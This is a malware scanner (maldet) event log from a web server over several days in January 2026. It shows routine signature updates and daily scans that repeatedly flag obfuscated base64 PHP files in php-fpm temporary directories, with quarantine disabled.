Jan 26 2026 04:56:24 web1 maldet(837770): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-03cfc7654c07455aad09a12046a4e0c4-ea-php83-php-fpm.service-UUdkvB/tmp/run_69766c3acb8c0.php
Jan 26 2026 04:56:24 web1 maldet(837770): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-03cfc7654c07455aad09a12046a4e0c4-ea-php83-php-fpm.service-UUdkvB/tmp/run_697734117500d.php
Jan 26 2026 04:56:24 web1 maldet(837770): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-03cfc7654c07455aad09a12046a4e0c4-ea-php83-php-fpm.service-UUdkvB/tmp/run_697638ae2a53c.php
Jan 26 2026 04:56:24 web1 maldet(837770): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-03cfc7654c07455aad09a12046a4e0c4-ea-php83-php-fpm.service-UUdkvB/tmp/run_6977008e31bd0.php
Jan 26 2026 04:56:24 web1 maldet(837770): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-03cfc7654c07455aad09a12046a4e0c4-ea-php83-php-fpm.service-UUdkvB/tmp/run_69760c53048a0.php
Jan 26 2026 04:56:24 web1 maldet(837770): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 1089, malware hits 24, cleaned hits 0, time 59s
Jan 26 2026 04:56:24 web1 maldet(837770): {scan} scan report saved, to view run: maldet --report 260126-0455.837770
Jan 26 2026 04:56:24 web1 maldet(837770): {scan} quarantine is disabled! set quarantine_hits=1 in conf.maldet or to quarantine results run: maldet -q 260126-0455.837770
Jan 26 2026 21:31:16 web1 maldet(1152): {mon} could not find inotifywait command, install yum package inotify-tools or download from https://github.com/rvoicilas/inotify-tools/wiki/
Jan 27 2026 04:35:13 web1 maldet(116927): {update} checking for available updates...
Jan 27 2026 04:35:13 web1 maldet(116927): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Jan 27 2026 04:35:13 web1 maldet(116927): {update} hashing install files and checking against server...
Jan 27 2026 04:35:13 web1 maldet(116927): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Jan 27 2026 04:35:13 web1 maldet(116927): {update} latest version already installed.
Jan 27 2026 04:35:13 web1 maldet(117036): {sigup} performing signature update check...
Jan 27 2026 04:35:13 web1 maldet(117036): {sigup} local signature set is version 202601253611720
Jan 27 2026 04:35:13 web1 maldet(117036): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Jan 27 2026 04:35:13 web1 maldet(117036): {sigup} latest signature set already installed
Jan 27 2026 04:35:13 web1 maldet(117127): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Jan 27 2026 04:35:13 web1 maldet(117127): {scan} signatures loaded: 17638 (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Jan 27 2026 04:35:13 web1 maldet(117127): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Jan 27 2026 04:35:13 web1 maldet(117127): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Jan 27 2026 04:35:13 web1 maldet(117127): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Jan 27 2026 04:35:44 web1 maldet(117127): {scan} file list completed in 31s, found 3571 files...
Jan 27 2026 04:35:44 web1 maldet(117127): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Jan 27 2026 04:35:44 web1 maldet(117127): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (3571 files) in progress...
Jan 27 2026 04:36:34 web1 maldet(117127): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-03cfc7654c07455aad09a12046a4e0c4-ea-php83-php-fpm.service-UUdkvB/tmp/run_6977c711769ed.php
Jan 27 2026 04:36:34 web1 maldet(117127): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-03cfc7654c07455aad09a12046a4e0c4-ea-php83-php-fpm.service-UUdkvB/tmp/run_6977607e83e70.php
Jan 27 2026 04:36:34 web1 maldet(117127): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-03cfc7654c07455aad09a12046a4e0c4-ea-php83-php-fpm.service-UUdkvB/tmp/run_697826e06f7af.php
Jan 27 2026 04:36:34 web1 maldet(117127): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-03cfc7654c07455aad09a12046a4e0c4-ea-php83-php-fpm.service-UUdkvB/tmp/run_69776487d1bed.php
Jan 27 2026 04:36:34 web1 maldet(117127): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-03cfc7654c07455aad09a12046a4e0c4-ea-php83-php-fpm.service-UUdkvB/tmp/run_6977f72d3ae2b.php
Jan 27 2026 04:36:34 web1 maldet(117127): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-03cfc7654c07455aad09a12046a4e0c4-ea-php83-php-fpm.service-UUdkvB/tmp/run_697825d9ebaac.php
Jan 27 2026 04:36:34 web1 maldet(117127): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-03cfc7654c07455aad09a12046a4e0c4-ea-php83-php-fpm.service-UUdkvB/tmp/run_6977c711769ed.php
Jan 27 2026 04:36:34 web1 maldet(117127): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-03cfc7654c07455aad09a12046a4e0c4-ea-php83-php-fpm.service-UUdkvB/tmp/run_6977607e83e70.php
Jan 27 2026 04:36:34 web1 maldet(117127): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-03cfc7654c07455aad09a12046a4e0c4-ea-php83-php-fpm.service-UUdkvB/tmp/run_697826e06f7af.php
Jan 27 2026 04:36:34 web1 maldet(117127): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-03cfc7654c07455aad09a12046a4e0c4-ea-php83-php-fpm.service-UUdkvB/tmp/run_69776487d1bed.php
Jan 27 2026 04:36:34 web1 maldet(117127): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-03cfc7654c07455aad09a12046a4e0c4-ea-php83-php-fpm.service-UUdkvB/tmp/run_6977f72d3ae2b.php
Jan 27 2026 04:36:34 web1 maldet(117127): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-03cfc7654c07455aad09a12046a4e0c4-ea-php83-php-fpm.service-UUdkvB/tmp/run_697825d9ebaac.php
Jan 27 2026 04:36:34 web1 maldet(117127): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 3571, malware hits 12, cleaned hits 0, time 81s
Jan 27 2026 04:36:34 web1 maldet(117127): {scan} scan report saved, to view run: maldet --report 260127-0435.117127
Jan 27 2026 04:36:34 web1 maldet(117127): {scan} quarantine is disabled! set quarantine_hits=1 in conf.maldet or to quarantine results run: maldet -q 260127-0435.117127
Jan 27 2026 13:13:07 web1 maldet(1169): {mon} could not find inotifywait command, install yum package inotify-tools or download from https://github.com/rvoicilas/inotify-tools/wiki/
Jan 28 2026 03:45:22 web1 maldet(248941): {update} checking for available updates...
Jan 28 2026 03:45:22 web1 maldet(248941): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Jan 28 2026 03:45:22 web1 maldet(248941): {update} hashing install files and checking against server...
Jan 28 2026 03:45:22 web1 maldet(248941): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Jan 28 2026 03:45:22 web1 maldet(248941): {update} latest version already installed.
Jan 28 2026 03:45:22 web1 maldet(249050): {sigup} performing signature update check...
Jan 28 2026 03:45:22 web1 maldet(249050): {sigup} local signature set is version 202601253611720
Jan 28 2026 03:45:22 web1 maldet(249050): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Jan 28 2026 03:45:22 web1 maldet(249050): {sigup} new signature set 20260128388144 available
Jan 28 2026 03:45:22 web1 maldet(249050): {sigup} downloading https://cdn.rfxn.com/downloads/maldet-sigpack.tgz
Jan 28 2026 03:45:22 web1 maldet(249050): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-sigpack.tgz
Jan 28 2026 03:45:23 web1 maldet(249050): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-sigpack.tgz.md5
Jan 28 2026 03:45:23 web1 maldet(249050): {sigup} downloading https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz
Jan 28 2026 03:45:23 web1 maldet(249050): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz
Jan 28 2026 03:45:23 web1 maldet(249050): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz.md5
Jan 28 2026 03:45:23 web1 maldet(249050): {sigup} verified md5sum of maldet-sigpack.tgz
Jan 28 2026 03:45:23 web1 maldet(249050): {sigup} unpacked and installed maldet-sigpack.tgz
Jan 28 2026 03:45:23 web1 maldet(249050): {sigup} verified md5sum of maldet-clean.tgz
Jan 28 2026 03:45:23 web1 maldet(249050): {sigup} unpacked and installed maldet-clean.tgz
Jan 28 2026 03:45:23 web1 maldet(249050): {sigup} signature set update completed
Jan 28 2026 03:45:23 web1 maldet(249050): {sigup} 17638 signatures (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Jan 28 2026 03:45:23 web1 maldet(249253): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Jan 28 2026 03:45:23 web1 maldet(249253): {scan} signatures loaded: 17638 (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Jan 28 2026 03:45:23 web1 maldet(249253): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Jan 28 2026 03:45:23 web1 maldet(249253): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Jan 28 2026 03:45:23 web1 maldet(249253): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Jan 28 2026 03:45:58 web1 maldet(249253): {scan} file list completed in 35s, found 16354 files...
Jan 28 2026 03:45:58 web1 maldet(249253): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Jan 28 2026 03:45:58 web1 maldet(249253): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (16354 files) in progress...
Jan 28 2026 03:48:08 web1 maldet(249253): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-b3a4aac7c4804b059831a8727c8bdfc6-ea-php83-php-fpm.service-A1z5YY/tmp/run_69791a49801de.php
Jan 28 2026 03:48:08 web1 maldet(249253): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-b3a4aac7c4804b059831a8727c8bdfc6-ea-php83-php-fpm.service-A1z5YY/tmp/run_6979afbfb85e1.php
Jan 28 2026 03:48:08 web1 maldet(249253): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-b3a4aac7c4804b059831a8727c8bdfc6-ea-php83-php-fpm.service-A1z5YY/tmp/run_6979b2c996418.php
Jan 28 2026 03:48:08 web1 maldet(249253): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-b3a4aac7c4804b059831a8727c8bdfc6-ea-php83-php-fpm.service-A1z5YY/tmp/run_69791ec3049a9.php
Jan 28 2026 03:48:08 web1 maldet(249253): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-b3a4aac7c4804b059831a8727c8bdfc6-ea-php83-php-fpm.service-A1z5YY/tmp/run_697950ae82d33.php
Jan 28 2026 03:48:08 web1 maldet(249253): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-6cfedd0c063840d28ea2f7c1829c2618-ea-php83-php-fpm.service-mkBUCM/tmp/run_6978ecf868cac.php
Jan 28 2026 03:48:08 web1 maldet(249253): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-6cfedd0c063840d28ea2f7c1829c2618-ea-php83-php-fpm.service-mkBUCM/tmp/run_6978bcbeacf6a.php
Jan 28 2026 03:48:08 web1 maldet(249253): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-b3a4aac7c4804b059831a8727c8bdfc6-ea-php83-php-fpm.service-A1z5YY/tmp/run_69791a49801de.php
Jan 28 2026 03:48:08 web1 maldet(249253): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-b3a4aac7c4804b059831a8727c8bdfc6-ea-php83-php-fpm.service-A1z5YY/tmp/run_6979afbfb85e1.php
Jan 28 2026 03:48:08 web1 maldet(249253): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-b3a4aac7c4804b059831a8727c8bdfc6-ea-php83-php-fpm.service-A1z5YY/tmp/run_6979b2c996418.php
Jan 28 2026 03:48:08 web1 maldet(249253): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-b3a4aac7c4804b059831a8727c8bdfc6-ea-php83-php-fpm.service-A1z5YY/tmp/run_69791ec3049a9.php
Jan 28 2026 03:48:08 web1 maldet(249253): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-b3a4aac7c4804b059831a8727c8bdfc6-ea-php83-php-fpm.service-A1z5YY/tmp/run_697950ae82d33.php
Jan 28 2026 03:48:08 web1 maldet(249253): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-6cfedd0c063840d28ea2f7c1829c2618-ea-php83-php-fpm.service-mkBUCM/tmp/run_6978ecf868cac.php
Jan 28 2026 03:48:08 web1 maldet(249253): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-6cfedd0c063840d28ea2f7c1829c2618-ea-php83-php-fpm.service-mkBUCM/tmp/run_6978bcbeacf6a.php
Jan 28 2026 03:48:08 web1 maldet(249253): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 16354, malware hits 14, cleaned hits 0, time 165s
Jan 28 2026 03:48:08 web1 maldet(249253): {scan} scan report saved, to view run: maldet --report 260128-0345.249253
Jan 28 2026 03:48:08 web1 maldet(249253): {scan} quarantine is disabled! set quarantine_hits=1 in conf.maldet or to quarantine results run: maldet -q 260128-0345.249253
Jan 28 2026 09:39:33 web1 maldet(1182): {mon} could not find inotifywait command, install yum package inotify-tools or download from https://github.com/rvoicilas/inotify-tools/wiki/
Jan 29 2026 04:04:35 web1 maldet(324295): {update} checking for available updates...
Jan 29 2026 04:04:35 web1 maldet(324295): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Jan 29 2026 04:04:35 web1 maldet(324295): {update} hashing install files and checking against server...
Jan 29 2026 04:04:35 web1 maldet(324295): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Jan 29 2026 04:04:35 web1 maldet(324295): {update} latest version already installed.
Jan 29 2026 04:04:35 web1 maldet(324406): {sigup} performing signature update check...
Jan 29 2026 04:04:35 web1 maldet(324406): {sigup} local signature set is version 20260128388144
Jan 29 2026 04:04:35 web1 maldet(324406): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Jan 29 2026 04:04:35 web1 maldet(324406): {sigup} latest signature set already installed
Jan 29 2026 04:04:35 web1 maldet(324494): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Jan 29 2026 04:04:35 web1 maldet(324494): {scan} signatures loaded: 17638 (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Jan 29 2026 04:04:35 web1 maldet(324494): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Jan 29 2026 04:04:35 web1 maldet(324494): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Jan 29 2026 04:04:35 web1 maldet(324494): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Jan 29 2026 04:05:07 web1 maldet(324494): {scan} file list completed in 32s, found 6140 files...
Jan 29 2026 04:05:07 web1 maldet(324494): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Jan 29 2026 04:05:07 web1 maldet(324494): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (6140 files) in progress...
Jan 29 2026 04:06:56 web1 maldet(324494): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-056e20c4450744388cd9d4201d593afd-ea-php83-php-fpm.service-T0cvIj/tmp/run_697a46178028b.php
Jan 29 2026 04:06:56 web1 maldet(324494): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-056e20c4450744388cd9d4201d593afd-ea-php83-php-fpm.service-T0cvIj/tmp/run_697a78cd0479e.php
Jan 29 2026 04:06:56 web1 maldet(324494): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-056e20c4450744388cd9d4201d593afd-ea-php83-php-fpm.service-T0cvIj/tmp/run_697b0ad97db59.php
Jan 29 2026 04:06:56 web1 maldet(324494): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-056e20c4450744388cd9d4201d593afd-ea-php83-php-fpm.service-T0cvIj/tmp/run_697aa9023b990.php
Jan 29 2026 04:06:57 web1 maldet(324494): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-056e20c4450744388cd9d4201d593afd-ea-php83-php-fpm.service-T0cvIj/tmp/run_697a74c7eb594.php
Jan 29 2026 04:06:57 web1 maldet(324494): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-056e20c4450744388cd9d4201d593afd-ea-php83-php-fpm.service-T0cvIj/tmp/run_697b0c5c416df.php
Jan 29 2026 04:06:57 web1 maldet(324494): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-056e20c4450744388cd9d4201d593afd-ea-php83-php-fpm.service-T0cvIj/tmp/run_697b089fb50ac.php
Jan 29 2026 04:06:57 web1 maldet(324494): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-056e20c4450744388cd9d4201d593afd-ea-php83-php-fpm.service-T0cvIj/tmp/run_697b07ab69864.php
Jan 29 2026 04:06:57 web1 maldet(324494): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-056e20c4450744388cd9d4201d593afd-ea-php83-php-fpm.service-T0cvIj/tmp/run_697ad90081913.php
Jan 29 2026 04:06:57 web1 maldet(324494): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-056e20c4450744388cd9d4201d593afd-ea-php83-php-fpm.service-T0cvIj/tmp/run_697b07157c6b0.php
Jan 29 2026 04:06:57 web1 maldet(324494): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-b3a4aac7c4804b059831a8727c8bdfc6-ea-php83-php-fpm.service-A1z5YY/tmp/run_697a17379c332.php
Jan 29 2026 04:06:57 web1 maldet(324494): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-b3a4aac7c4804b059831a8727c8bdfc6-ea-php83-php-fpm.service-A1z5YY/tmp/run_697a1718b02ff.php
Jan 29 2026 04:06:57 web1 maldet(324494): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-056e20c4450744388cd9d4201d593afd-ea-php83-php-fpm.service-T0cvIj/tmp/run_697a46178028b.php
Jan 29 2026 04:06:57 web1 maldet(324494): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-056e20c4450744388cd9d4201d593afd-ea-php83-php-fpm.service-T0cvIj/tmp/run_697a78cd0479e.php
Jan 29 2026 04:06:57 web1 maldet(324494): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-056e20c4450744388cd9d4201d593afd-ea-php83-php-fpm.service-T0cvIj/tmp/run_697b0ad97db59.php
Jan 29 2026 04:06:57 web1 maldet(324494): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-056e20c4450744388cd9d4201d593afd-ea-php83-php-fpm.service-T0cvIj/tmp/run_697aa9023b990.php
Jan 29 2026 04:06:57 web1 maldet(324494): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-056e20c4450744388cd9d4201d593afd-ea-php83-php-fpm.service-T0cvIj/tmp/run_697a74c7eb594.php
Jan 29 2026 04:06:57 web1 maldet(324494): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-056e20c4450744388cd9d4201d593afd-ea-php83-php-fpm.service-T0cvIj/tmp/run_697b0c5c416df.php
Jan 29 2026 04:06:57 web1 maldet(324494): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-056e20c4450744388cd9d4201d593afd-ea-php83-php-fpm.service-T0cvIj/tmp/run_697b089fb50ac.php
Jan 29 2026 04:06:57 web1 maldet(324494): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-056e20c4450744388cd9d4201d593afd-ea-php83-php-fpm.service-T0cvIj/tmp/run_697b07ab69864.php
Jan 29 2026 04:06:57 web1 maldet(324494): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-056e20c4450744388cd9d4201d593afd-ea-php83-php-fpm.service-T0cvIj/tmp/run_697ad90081913.php
Jan 29 2026 04:06:57 web1 maldet(324494): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-056e20c4450744388cd9d4201d593afd-ea-php83-php-fpm.service-T0cvIj/tmp/run_697b07157c6b0.php
Jan 29 2026 04:06:57 web1 maldet(324494): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-b3a4aac7c4804b059831a8727c8bdfc6-ea-php83-php-fpm.service-A1z5YY/tmp/run_697a17379c332.php
Jan 29 2026 04:06:57 web1 maldet(324494): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-b3a4aac7c4804b059831a8727c8bdfc6-ea-php83-php-fpm.service-A1z5YY/tmp/run_697a1718b02ff.php
Jan 29 2026 04:06:57 web1 maldet(324494): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 6140, malware hits 24, cleaned hits 0, time 142s
Jan 29 2026 04:06:57 web1 maldet(324494): {scan} scan report saved, to view run: maldet --report 260129-0404.324494
Jan 29 2026 04:06:57 web1 maldet(324494): {scan} quarantine is disabled! set quarantine_hits=1 in conf.maldet or to quarantine results run: maldet -q 260129-0404.324494
Jan 29 2026 13:13:09 web1 maldet(1190): {mon} could not find inotifywait command, install yum package inotify-tools or download from https://github.com/rvoicilas/inotify-tools/wiki/
Jan 30 2026 04:04:08 web1 maldet(257290): {update} checking for available updates...
Jan 30 2026 04:04:08 web1 maldet(257290): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Jan 30 2026 04:04:08 web1 maldet(257290): {update} hashing install files and checking against server...
Jan 30 2026 04:04:08 web1 maldet(257290): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Jan 30 2026 04:04:08 web1 maldet(257290): {update} latest version already installed.
Jan 30 2026 04:04:08 web1 maldet(257405): {sigup} performing signature update check...
Jan 30 2026 04:04:08 web1 maldet(257405): {sigup} local signature set is version 20260128388144
Jan 30 2026 04:04:08 web1 maldet(257405): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Jan 30 2026 04:04:08 web1 maldet(257405): {sigup} latest signature set already installed
Jan 30 2026 04:04:08 web1 maldet(257493): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Jan 30 2026 04:04:09 web1 maldet(257493): {scan} signatures loaded: 17638 (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Jan 30 2026 04:04:09 web1 maldet(257493): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Jan 30 2026 04:04:09 web1 maldet(257493): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Jan 30 2026 04:04:09 web1 maldet(257493): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Jan 30 2026 04:04:40 web1 maldet(257493): {scan} file list completed in 31s, found 24451 files...
Jan 30 2026 04:04:40 web1 maldet(257493): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Jan 30 2026 04:04:40 web1 maldet(257493): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (24451 files) in progress...
Jan 30 2026 04:08:14 web1 maldet(257493): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-056e20c4450744388cd9d4201d593afd-ea-php83-php-fpm.service-T0cvIj/tmp/run_697b3bcfccd46.php
Jan 30 2026 04:08:14 web1 maldet(257493): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-056e20c4450744388cd9d4201d593afd-ea-php83-php-fpm.service-T0cvIj/tmp/run_697b6c768515c.php
Jan 30 2026 04:08:14 web1 maldet(257493): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-056e20c4450744388cd9d4201d593afd-ea-php83-php-fpm.service-T0cvIj/tmp/run_697b3927a4417.php
Jan 30 2026 04:08:14 web1 maldet(257493): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-056e20c4450744388cd9d4201d593afd-ea-php83-php-fpm.service-T0cvIj/tmp/run_697b38410e879.php
Jan 30 2026 04:08:14 web1 maldet(257493): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-ccea4736341d4f4f9dfbbbc8f321e0b6-ea-php83-php-fpm.service-0Vk1eD/tmp/run_697c03926dd57.php
Jan 30 2026 04:08:14 web1 maldet(257493): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-ccea4736341d4f4f9dfbbbc8f321e0b6-ea-php83-php-fpm.service-0Vk1eD/tmp/run_697c030f710cb.php
Jan 30 2026 04:08:14 web1 maldet(257493): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-ccea4736341d4f4f9dfbbbc8f321e0b6-ea-php83-php-fpm.service-0Vk1eD/tmp/run_697bfd5f51918.php
Jan 30 2026 04:08:14 web1 maldet(257493): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-ccea4736341d4f4f9dfbbbc8f321e0b6-ea-php83-php-fpm.service-0Vk1eD/tmp/run_697bcc2fd392a.php
Jan 30 2026 04:08:14 web1 maldet(257493): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-ccea4736341d4f4f9dfbbbc8f321e0b6-ea-php83-php-fpm.service-0Vk1eD/tmp/run_697c03f845ba3.php
Jan 30 2026 04:08:14 web1 maldet(257493): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-056e20c4450744388cd9d4201d593afd-ea-php83-php-fpm.service-T0cvIj/tmp/run_697b3bcfccd46.php
Jan 30 2026 04:08:14 web1 maldet(257493): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-056e20c4450744388cd9d4201d593afd-ea-php83-php-fpm.service-T0cvIj/tmp/run_697b6c768515c.php
Jan 30 2026 04:08:14 web1 maldet(257493): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-056e20c4450744388cd9d4201d593afd-ea-php83-php-fpm.service-T0cvIj/tmp/run_697b3927a4417.php
Jan 30 2026 04:08:14 web1 maldet(257493): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-056e20c4450744388cd9d4201d593afd-ea-php83-php-fpm.service-T0cvIj/tmp/run_697b38410e879.php
Jan 30 2026 04:08:14 web1 maldet(257493): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-ccea4736341d4f4f9dfbbbc8f321e0b6-ea-php83-php-fpm.service-0Vk1eD/tmp/run_697c03926dd57.php
Jan 30 2026 04:08:14 web1 maldet(257493): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-ccea4736341d4f4f9dfbbbc8f321e0b6-ea-php83-php-fpm.service-0Vk1eD/tmp/run_697c030f710cb.php
